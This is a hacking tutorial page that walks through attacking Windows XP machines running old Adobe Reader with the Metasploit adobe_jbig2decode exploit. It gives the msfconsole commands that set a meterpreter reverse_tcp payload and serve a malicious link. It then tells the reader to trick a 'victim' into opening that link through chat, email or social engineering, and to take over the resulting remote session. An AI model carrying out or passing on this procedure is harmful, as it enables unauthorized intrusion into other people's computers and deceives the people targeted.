Hack any Remote PC with Adobe JBIG2Decode Heap Corruption Exploit

This module exploits a heap-based pointer corruption flaw in Adobe Reader 9.0.0 and earlier. This module relies upon JavaScript for the heap spray.

Exploit Targets

0 – Adobe Reader v9.0.0 (Windows XP SP3 English) (default)

1 – Adobe Reader v8.1.2 (Windows XP SP2 English

Requirement

Attacker: Backtrack 5 

Victim PC: Windows XP

Open backtrack terminal type msfconsole

Hack any Remote PC with Adobe JBIG2Decode Heap Corruption Exploit

Now type use exploit/windows/browser/adobe_jbig2decode

Msf exploit (adobe_jbig2decode)>set payload windows/meterpreter/reverse_tcp

Msf exploit (adobe_jbig2decode)>set lhost 192.168.1.4 (IP of Local Host)

Msf exploit (adobe_jbig2decode)>set srvhost 192.168.1.4 (This must be an address on the local machine)

Msf exploit (adobe_jbig2decode)>set uripath akonsong (The Url to use for this exploit)

Msf exploit (adobe_jbig2decode)>exploit

Hack any Remote PC with Adobe JBIG2Decode Heap Corruption Exploit

Now an URL you should give to your victim //192.168.1.4:8080/akonsong

Hack any Remote PC with Adobe JBIG2Decode Heap Corruption Exploit

Send the link of the server to the victim via chat or email or any social engineering technique.

Hack any Remote PC with Adobe JBIG2Decode Heap Corruption Exploit

When the victim opens that link in their browser, immediately it will alert a dialog box about akonsong PDF like picture below.

Hack any Remote PC with Adobe JBIG2Decode Heap Corruption Exploit

Now you have access to the victims PC. Use “Sessions -l” and the Session number to connect to the session. And Now Type “sessions -i ID

Hack any Remote PC with Adobe JBIG2Decode Heap Corruption Exploit

Leave a Reply

Your email address will not be published. Required fields are marked *